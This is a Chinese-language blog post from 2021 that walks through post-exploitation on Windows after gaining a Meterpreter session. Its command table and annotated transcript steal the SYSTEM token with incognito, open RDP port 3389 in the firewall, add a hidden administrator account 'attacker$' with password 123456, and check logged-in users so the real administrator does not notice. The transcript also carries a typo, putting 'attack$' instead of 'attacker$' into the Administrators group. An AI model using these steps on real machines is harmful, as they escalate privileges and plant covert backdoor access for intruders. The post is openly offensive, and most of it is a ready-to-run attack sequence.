Windows获取到meterpreter会话后的操作

说明 命令
查看当前用户 getuid
如果是低权限账号,我们先加载会话令牌模块 use incognito
列出会话令牌 list_tokens -u
发现有高权限账号令牌后盗取令牌 impersonate_token "NT AUTHORITY\SYSTEM"
shell乱码使用此命令 chcp 65001
获取系统信息 systeminfo
添加防火墙规则,将3389放行 netsh firewall add portopening protocol = TCP port = 3389 name = rdp
添加隐藏用户 net user attacker$ 123456 /add
添加用户到管理组 net localgroup Administrators attacker$ /add
查看当前服务器 在线用户情况 quser 
meterpreter > getuid     ## 获取当前用户
Server username: SIMONF0CB\simon
meterpreter > use incognito  ## 加载会话令牌模块
Loading extension incognito...Success.
meterpreter > list_tokens -u ## 列出会话令牌
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT AUTHORITY\SYSTEM
SIMONF0CB\simon

Impersonation Tokens Available
========================================
No tokens available

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" ## 盗取system令牌
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid ## 成功盗取令牌,目前是最高权限(如果获取到的是administrator权限,可以通过getsystem进一步提权到system权限)
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 4980 created.
Channel 5 created.
Microsoft Windows [�汾 10.0.18363.592]
(c) 2019 Microsoft Corporation����������Ȩ���� ## 发现存在乱码
C:\Windows\system32>chcp 65001 ## 通过此命令,乱码就没了
chcp 65001
Active code page: 65001

C:\Windows\system32>systeminfo ## 通过systeminfo获取系统信息
systeminfo

Host Name:                 SIMONF0CB
OS Name:                   Microsoft Windows 10 专业工作站版
OS Version:                10.0.18363 N/A Build 18363
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          simon


C:\Windows\system32>netsh firewall add portopening protocol = TCP port = 3389 name = rdp  ## 添加防火墙规则,将3389放行(如果目标机器3389无法联通的时候)
netsh firewall add portopening protocol = TCP port = 3389 name = rdp

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .

Ok.

C:\Windows\system32>net user attacker$ 123456 /add ## 添加隐藏用户
C:\Windows\system32>net localgroup Administrators attack$ /add ## 将刚刚添加的用户加入管理员组

C:\Windows\system32>quser ## 查看当前服务器 在线用户情况(防止直接登录将管理员挤下去)

posted on 2021-05-18 10:03  tech_lee  阅读(303)  评论(0编辑  收藏  举报

导航